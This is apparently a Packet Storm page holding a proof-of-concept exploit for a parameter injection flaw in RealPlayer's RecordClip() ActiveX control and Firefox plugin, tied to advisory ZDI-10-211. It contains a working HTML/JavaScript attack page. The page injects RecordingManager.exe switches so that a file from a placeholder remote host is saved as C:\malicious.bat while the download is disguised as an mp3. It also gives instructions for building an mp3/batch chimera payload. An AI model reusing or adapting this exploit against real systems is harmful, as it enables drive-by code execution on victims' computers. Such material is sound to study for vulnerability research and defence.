Proof of concept code that demonstrates the parameter injection bug in Realplayers RecordClip() active-x function and firefox plug-in.
7b18c3b5a9970d8c01c331496f0c8e4acc8c9971ea87892773cf44ea08e54bb7<html>
<p>
Written by Sean de Regge (seanderegge hotmail.com)
Exploit for the parameter injection bug in Realplayers RecordClip() activeX function and firefox plugin
http://www.zerodayinitiative.com/advisories/ZDI-10-211/
C:\Program Files\Real\RealPlayer\RecordingManager.exe has 2 interesting switches:
/t will spoof the download of any file so you can make it look like it's downloading a normal mp3 file
/f will make it download to any location on the disk instead of the realplayer downloads folder
Restrictions:
The extension on server side must be a valid media file (ie: .mp3)
Realplayer does some checks on the file to see if it is a valid media file too, so we need to create a
chimera file, which will parse as a valid mp3 file and a valid batch file.
Best is to take a valid mp3 file and modify it in a hex editor to have your batch commands in the first couple of bytes.
</p>
<OBJECT ID="obj" WIDTH=0 HEIGHT=0 CLASSID="CLSID:FDC7A535-4070-4B92-A0EA-D9994BCC0DC5">
</OBJECT>
<embed type="audio/x-pn-realaudio-plugin"
controls="ImageWindow"
console="video1"
src='http://xx.xx.xx.xx/batch_file_in_mp3.mp3" /f C:\\malicious.bat /t cool_song.mp3'
width="240"
height="180"
autostart=true>
</embed>
<script>
var file = 'http://xx.xx.xx.xx/batch_file_in_mp3.mp3" /f C:\\malicious.bat /t cool_song.mp3';
obj.RecordClip(file, "audio/mpeg3", "clipInfo");
</script>
</html>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed